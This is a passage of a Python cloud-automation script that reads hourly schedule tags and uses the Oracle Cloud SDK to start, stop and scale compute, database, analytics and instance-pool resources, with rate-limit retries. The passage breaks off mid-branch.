MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) rescaling instance pool {}".format(response.status, self.NAME))
Retry = False
###############################################
# AnalyticsThread
###############################################
class AnalyticsThread(threading.Thread):
def __init__(self, threadID, ID, NAME, CPU):
threading.Thread.__init__(self)
self.threadID = threadID
self.ID = ID
self.NAME = NAME
self.CPU = CPU
def run(self):
global total_resources
global ErrorsFound
global errors
global success
MakeOut(" - Starting Analytics Service {} and after that scaling to {} cpus".format(self.NAME, self.CPU))
Retry = True
while Retry:
try:
response = analytics.start_analytics_instance(analytics_instance_id=self.ID)
Retry = False
success.append("Started Analytics Service {}".format(self.NAME))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Starting Analytics Service {}".format(response.status, self.NAME))
Retry = False
response = analytics.get_analytics_instance(analytics_instance_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
time.sleep(10)
while response.data.lifecycle_state != "ACTIVE":
response = analytics.get_analytics_instance(analytics_instance_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
time.sleep(10)
MakeOut("Analytics Service {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
capacity = oci.analytics.models.capacity.Capacity()
capacity.capacity_value = self.CPU
capacity.capacity_type = capacity.CAPACITY_TYPE_OLPU_COUNT
details = oci.analytics.models.ScaleAnalyticsInstanceDetails()
details.capacity = capacity
Retry = True
while Retry:
try:
response = analytics.scale_analytics_instance(analytics_instance_id=self.ID, scale_analytics_instance_details=details)
Retry = False
success.append("Analytics Service {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
errors.append("Error ({}) re-scaling Analytics to {} cpus for {}".format(response.status, self.CPU, self.NAME))
Retry = False
##########################################################################
# Load compartments
##########################################################################
def identity_read_compartments(identity, tenancy):
MakeOut("Loading Compartments...")
try:
cs = oci.pagination.list_call_get_all_results(
identity.list_compartments,
tenancy.id,
compartment_id_in_subtree=True,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY
).data
# Add root compartment which is not part of the list_compartments
tenant_compartment = oci.identity.models.Compartment()
tenant_compartment.id = tenancy.id
tenant_compartment.name = tenancy.name
tenant_compartment.lifecycle_state = oci.identity.models.Compartment.LIFECYCLE_STATE_ACTIVE
cs.append(tenant_compartment)
MakeOut(" Total " + str(len(cs)) + " compartments loaded.")
return cs
except Exception as e:
raise RuntimeError("Error in identity_read_compartments: " + str(e.args))
##########################################################################
# Handle Region
##########################################################################
def autoscale_region(region):
# Global Paramters for update
global total_resources
global ErrorsFound
global errors
global success
MakeOut("Starting Auto Scaling script on region {}, executing {} actions".format(region, Action))
threads = [] # Thread array for async AutonomousDB start and rescale
tcount = 0
###############################################
# Get Current Day, time
###############################################
DayOfWeek, Day, CurrentHour = get_current_hour(region, cmd.ignore_region_time)
if AlternativeWeekend:
MakeOut("Using Alternative weekend (Friday and Saturday as weekend")
if cmd.ignore_region_time:
MakeOut("Ignoring Region Datetime, Using local time")
MakeOut("Day of week: {}, IsWeekday: {}, Current hour: {}".format(Day, isWeekDay(DayOfWeek), CurrentHour))
# Array start with 0 so decrease CurrentHour with 1, if hour = 0 then 23
CurrentHour = 23 if CurrentHour == 0 else CurrentHour - 1
###############################################
# Find all resources with a Schedule Tag
###############################################
MakeOut("Getting all resources supported by the search function...")
query = "query all resources where (definedTags.namespace = '{}')".format(PredefinedTag)
query += " && compartmentId = '" + compartment_include + "'" if compartment_include else ""
query += " && compartmentId != '" + compartment_exclude + "'" if compartment_exclude else ""
sdetails = oci.resource_search.models.StructuredSearchDetails()
sdetails.query = query
NoError = True
try:
result = search.search_resources(search_details=sdetails, limit=1000, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
except oci.exceptions.ServiceError as response:
print ("Error: {} - {}".format(response.code, response.message))
result = oci.resource_search.models.ResourceSummaryCollection()
result.items = []
#################################################################
# Find additional resources not found by search (MySQL Service)
#################################################################
if not cmd.ignoremysql:
MakeOut("Finding MySQL instances in {} Compartments...".format(len(compartments)))
for c in compartments:
# check compartment include and exclude
if c.lifecycle_state != oci.identity.models.Compartment.LIFECYCLE_STATE_ACTIVE:
continue
if compartment_include:
if c.id != compartment_include:
continue
if compartment_exclude:
if c.id == compartment_exclude:
continue
mysql_instances = []
try:
mysql_instances = oci.pagination.list_call_get_all_results(
mysql.list_db_systems,
compartment_id=c.id,
retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY
).data
except Exception:
MakeOut("e", True)
mysql_instances = []
continue
for mysql_instance in mysql_instances:
if PredefinedTag not in mysql_instance.defined_tags or mysql_instance.lifecycle_state != "ACTIVE":
continue
summary = oci.resource_search.models.ResourceSummary()
summary.availability_domain = mysql_instance.availability_domain
summary.compartment_id = mysql_instance.compartment_id
summary.defined_tags = mysql_instance.defined_tags
summary.freeform_tags = mysql_instance.freeform_tags
summary.identifier = mysql_instance.id
summary.lifecycle_state = mysql_instance.lifecycle_state
summary.display_name = mysql_instance.display_name
summary.resource_type = "MysqlDBInstance"
result.items.append(summary)
MakeOut("")
#################################################################
# All the items with a schedule are now collected.
# Let's go thru them and find / validate the correct schedule
#################################################################
total_resources += len(result.items)
MakeOut("")
MakeOut("Checking {} Resources for Auto Scale...".format(len(result.items)))
for resource in result.items:
# The search data is not always updated. Get the tags from the actual resource itself, not using the search data.
resourceOk = False
if cmd.print_ocid:
MakeOut("Checking {} ({}) - {}...".format(resource.display_name, resource.resource_type, resource.identifier))
else:
MakeOut("Checking {} ({})...".format(resource.display_name, resource.resource_type))
if resource.resource_type == "Instance":
resourceDetails = compute.get_instance(instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "DbSystem":
resourceDetails = database.get_db_system(db_system_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "VmCluster":
resourceDetails = database.get_vm_cluster(vm_cluster_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "AutonomousDatabase":
resourceDetails = database.get_autonomous_database(autonomous_database_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "InstancePool":
resourceDetails = pool.get_instance_pool(instance_pool_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "OdaInstance":
resourceDetails = oda.get_oda_instance(oda_instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "AnalyticsInstance":
resourceDetails = analytics.get_analytics_instance(analytics_instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "IntegrationInstance":
resourceDetails = integration.get_integration_instance(integration_instance_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "LoadBalancer":
resourceDetails = loadbalancer.get_load_balancer(load_balancer_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "MysqlDBInstance":
resourceDetails = mysql.get_db_system(db_system_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "GoldenGateDeployment":
resourceDetails = goldengate.get_deployment(deployment_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if resource.resource_type == "DISWorkspace":
resourceDetails = dataintegration.get_workspace(workspace_id=resource.identifier, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
resourceOk = True
if not isDeleted(resource.lifecycle_state) and resourceOk:
schedule = resourceDetails.defined_tags[PredefinedTag]
ActiveSchedule = ""
if AnyDay in schedule:
ActiveSchedule = schedule[AnyDay]
if isWeekDay(DayOfWeek): # check for weekday / weekend
if WeekDay in schedule:
ActiveSchedule = schedule[WeekDay]
else:
if Weekend in schedule:
ActiveSchedule = schedule[Weekend]
if Day in schedule: # Check for day specific tag (today)
ActiveSchedule = schedule[Day]
#################################################################
# Check if the active schedule contains exactly 24 numbers for each hour of the day
#################################################################
if ActiveSchedule != "":
try:
schedulehours = ActiveSchedule.split(",")
if len(schedulehours) != 24:
ErrorsFound = True
errors.append(" - Error with schedule of {} - {}, not correct amount of hours, I count {}".format(resource.display_name, ActiveSchedule, len(schedulehours)))
MakeOut(" - Error with schedule of {} - {}, not correct amount of hours, i count {}".format(resource.display_name, ActiveSchedule, len(schedulehours)))
ActiveSchedule = ""
except Exception:
ErrorsFound = True
ActiveSchedule = ""
errors.append(" - Error with schedule for {}".format(resource.display_name))
MakeOut(" - Error with schedule of {}".format(resource.display_name))
MakeOut(sys.exc_info()[0])
else:
MakeOut(" - Ignoring instance, as no active schedule for today found")
###################################################################################
# if schedule validated, let see if we can apply the new schedule to the resource
###################################################################################
if ActiveSchedule != "":
DisplaySchedule = ""
c = 0
for h in schedulehours:
if c == CurrentHour:
DisplaySchedule = DisplaySchedule + "[" + h + "],"
else:
DisplaySchedule = DisplaySchedule + h + ","
c = c + 1
MakeOut(" - Active schedule for {}: {}".format(resource.display_name, DisplaySchedule))
if schedulehours[CurrentHour] == "*":
MakeOut(" - Ignoring this service for this hour")
else:
###################################################################################
# Instance
###################################################################################
if resource.resource_type == "Instance":
# Only perform action if VM Instance, ignoring any BM instances.
if resourceDetails.shape[:2] == "VM":
######## WAIT UNTIL THE INSTANCE HAS A VALID STATE (RUNNING OR STOPPED) ########
while (compute.get_instance(resource.identifier).data.lifecycle_state.upper() != "RUNNING" and compute.get_instance(resource.identifier).data.lifecycle_state.upper() != "STOPPED") :
time.sleep(5)
######## SHUTDOWN ########
if resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) == 0:
MakeOut(" - Initiate Compute VM shutdown for {}".format(resource.display_name))
MakeLog("[STOP] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.instance_action(instance_id=resource.identifier, action=ComputeShutdownMethod)
Retry = False
success.append(" - Initiate Compute VM shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Compute VM Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
######## SCALE UP/DOWN ########
if resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) != 0:
if int(resourceDetails.shape_config.ocpus) != int(schedulehours[CurrentHour]) :
MakeOut(" - Initiate Compute VM scale for {}".format(resource.display_name))
MakeLog("[SCALE] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.update_instance(instance_id=resource.identifier, update_instance_details=oci.core.models.UpdateInstanceDetails(shape_config=oci.core.models.UpdateInstanceShapeConfigDetails(ocpus=int(schedulehours[CurrentHour]),memory_in_gbs=int(resourceDetails.shape_config.memory_in_gbs))))
Retry = False
success.append(" - Initiate Compute VM scale for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM scale for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Compute VM scale for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) > 0:
######## START AND SCALE UP/DOWN ########
if int(resourceDetails.shape_config.ocpus) != int(schedulehours[CurrentHour]) :
MakeOut(" - Initiate Compute VM startup and scale for {}".format(resource.display_name))
MakeLog("[START | SCALE] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.instance_action(instance_id=resource.identifier, action="START")
while compute.get_instance(resource.identifier).data.lifecycle_state != "RUNNING" :
time.sleep(5)
response = compute.update_instance(instance_id=resource.identifier, update_instance_details=oci.core.models.UpdateInstanceDetails(shape_config=oci.core.models.UpdateInstanceShapeConfigDetails(ocpus=int(schedulehours[CurrentHour]),memory_in_gbs=int(resourceDetails.shape_config.memory_in_gbs))))
Retry = False
success.append(" - Initiate Compute VM startup and scale for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM startup and scale for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
######## START ########
if int(resourceDetails.shape_config.ocpus) == int(schedulehours[CurrentHour]) :
MakeOut(" - Initiate Compute VM startup for {}".format(resource.display_name))
MakeLog("[START] Instance {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = compute.instance_action(instance_id=resource.identifier, action="START")
Retry = False
success.append(" - Initiate Compute VM startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Compute VM startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# DBSystem
###################################################################################
if resource.resource_type == "DbSystem":
# Execute On/Off operations for Database VMs
if resourceDetails.shape[:2] == "VM":
dbnodes = database.list_db_nodes(compartment_id=resource.compartment_id, db_system_id=resource.identifier).data
for dbnodedetails in dbnodes:
if int(schedulehours[CurrentHour]) == 0 or int(schedulehours[CurrentHour]) == 1:
if dbnodedetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) == 0:
MakeOut(" - Initiate DB VM shutdown for {}".format(resource.display_name))
MakeLog("[STOP] DB VM {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.db_node_action(db_node_id=dbnodedetails.id, action="STOP")
Retry = False
success.append(" - Initiate DB VM shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB VM shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if dbnodedetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) == 1:
MakeOut(" - Initiate DB VM startup for {}".format(resource.display_name))
MakeLog("[START] DB VM {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.db_node_action(db_node_id=dbnodedetails.id, action="START")
Retry = False
success.append(" - Initiate DB VM startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB VM startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
###################################################################################
# BM
###################################################################################
if resourceDetails.shape[:2] == "BM":
if int(schedulehours[CurrentHour]) > 1 and int(schedulehours[CurrentHour]) < 53:
if resourceDetails.cpu_core_count > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate DB BM Scale Down to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(
" - Initiate DB BM Scale Down from {}to {} for {}".format(resourceDetails.cpu_core_count, (schedulehours[CurrentHour]),
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB BM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count,
int(schedulehours[CurrentHour]),
resource.display_name, response.message))
MakeOut(" - Error ({}) DB BM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count,
int(schedulehours[CurrentHour]),
resource.display_name, response.message))
Retry = False
if resourceDetails.cpu_core_count < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(" - Initiate DB BM Scale UP to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(
" - Initiate DB BM Scale UP from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]),
resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) DB BM Scale UP from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) DB BM Scale UP from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
###################################################################################
# Exadata
###################################################################################
if resourceDetails.shape[:7] == "Exadata":
if resourceDetails.cpu_core_count > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Exadata CS Scale Down from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]),
resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(" - Initiate Exadata DB Scale Down to {} at {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Exadata DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Exadata DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
if resourceDetails.cpu_core_count < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Exadata CS Scale UP from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateDbSystemDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_db_system(db_system_id=resource.identifier, update_db_system_details=dbupdate)
Retry = False
success.append(" - Initiate Exadata DB BM Scale UP from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Exadata DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Exadata DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
###################################################################################
# VmCluster
###################################################################################
if resource.resource_type == "VmCluster":
if int(schedulehours[CurrentHour]) >= 0 and int(schedulehours[CurrentHour]) < 401:
# Cluster VM is running, request is amount of CPU core change is needed
if resourceDetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) > 0:
if resourceDetails.cpus_enabled > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate ExadataC@C VM Cluster Scale Down to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateVmClusterDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_vm_cluster(vm_cluster_id=resource.identifier, update_vm_cluster_details=dbupdate)
Retry = False
success.append(" - Initiate ExadataC&C Cluster VM Scale Down from {} to {} for {}".format(resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) ExadataC&C Cluster VM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) ExadataC&C Cluster VM Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
if resourceDetails.cpus_enabled < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(
" - Initiate ExadataC@C VM Cluster Scale Up from {} to {} for {}".format(resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateVmClusterDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_vm_cluster(vm_cluster_id=resource.identifier, update_vm_cluster_details=dbupdate)
Retry = False
success.append(" - Initiate ExadataC&C Cluster VM Scale Up to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) ExadataC&C Cluster VM Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) ExadataC&C Cluster VM Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpus_enabled, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
###################################################################################
# AutonomousDatabase
###################################################################################
# Execute CPU Scale Up/Down operations for Database BMs
if resource.resource_type == "AutonomousDatabase":
if int(schedulehours[CurrentHour]) >= 0 and int(schedulehours[CurrentHour]) < 129:
# Autonomous DB is running request is amount of CPU core change is needed
if resourceDetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) > 0:
if resourceDetails.cpu_core_count > int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Down":
MakeOut(" - Initiate Autonomous DB Scale Down to {} for {}".format(int(schedulehours[CurrentHour]),
resource.display_name))
dbupdate = oci.database.models.UpdateAutonomousDatabaseDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_autonomous_database(autonomous_database_id=resource.identifier, update_autonomous_database_details=dbupdate)
Retry = False
success.append(" - Initiate Autonomous DB Scale Down from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Scale Down from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
if resourceDetails.cpu_core_count < int(schedulehours[CurrentHour]):
if Action == "All" or Action == "Up":
MakeOut(" - Initiate Autonomous DB Scale Up from {} to {} for {}".format(resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name))
dbupdate = oci.database.models.UpdateAutonomousDatabaseDetails()
dbupdate.cpu_core_count = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = database.update_autonomous_database(autonomous_database_id=resource.identifier, update_autonomous_database_details=dbupdate)
Retry = False
success.append(" - Initiate Autonomous DB Scale Up to {} for {}".format(int(schedulehours[CurrentHour]), resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Scale Up from {} to {} for {} - {}".format(response.status, resourceDetails.cpu_core_count, int(schedulehours[CurrentHour]), resource.display_name, response.message))
Retry = False
# Autonomous DB is running request is to stop the database
if resourceDetails.lifecycle_state == "AVAILABLE" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
MakeOut(" - Stoping Autonomous DB {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.stop_autonomous_database(autonomous_database_id=resource.identifier)
Retry = False
success.append(" - Initiate Autonomous DB Shutdown for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Shutdown for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
if resourceDetails.lifecycle_state == "STOPPED" and int(schedulehours[CurrentHour]) > 0:
if Action == "All" or Action == "Up":
# Autonomous DB is stopped and needs to be started with same amount of CPUs configured
if resourceDetails.cpu_core_count == int(schedulehours[CurrentHour]):
MakeOut(" - Starting Autonomous DB {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = database.start_autonomous_database(autonomous_database_id=resource.identifier)
Retry = False
success.append(" - Initiate Autonomous DB Startup for {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Autonomous DB Startup for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Autonomous DB Startup for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
# Autonomous DB is stopped and needs to be started, after that it requires CPU change
if resourceDetails.cpu_core_count != int(schedulehours[CurrentHour]):
tcount = tcount + 1
thread = AutonomousThread(tcount, resource.identifier, resource.display_name, int(schedulehours[CurrentHour]))
thread.start()
threads.append(thread)
###################################################################################
# InstancePool
###################################################################################
if resource.resource_type == "InstancePool":
# Stop Resource pool action
if resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) == 0:
if Action == "All" or Action == "Down":
success.append(" - Stopping instance pool {}".format(resource.display_name))
MakeOut(" - Stopping instance pool {}".format(resource.display_name))
Retry = True
while Retry:
try:
response = pool.stop_instance_pool(instance_pool_id=resource.identifier)
Retry = False
success.append(" - Stopping instance pool {}".format(resource.display_name))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Stopping instance pool for {} - {}".format(response.status, resource.display_name, response.message))
MakeOut(" - Error ({}) Stopping instance pool for {} - {}".format(response.status, resource.display_name, response.message))
Retry = False
# Scale up action on running instance pool
elif resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) > resourceDetails.size:
if Action == "All" or Action == "Up":
MakeOut(" - Scaling up instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
pooldetails = oci.core.models.UpdateInstancePoolDetails()
pooldetails.size = int(schedulehours[CurrentHour])
Retry = True
while Retry:
try:
response = pool.update_instance_pool(instance_pool_id=resource.identifier, update_instance_pool_details=pooldetails)
Retry = False
success.append(" - Scaling up instance pool {} to {} instances".format(resource.display_name, int(schedulehours[CurrentHour])))
except oci.exceptions.ServiceError as response:
if response.status == 429:
MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
time.sleep(RateLimitDelay)
else:
ErrorsFound = True
errors.append(" - Error ({}) Scaling up instance pool {} to {} instances - {}".format(response.status, resource.display_name, int(schedulehours[CurrentHour]), response.message))
Retry = False
# Scale down action on running instance pool
elif resourceDetails.lifecycle_state == "RUNNING" and int(schedulehours[CurrentHour]) < resourceDetails.size:
if Action == "All" or Action == "Down":
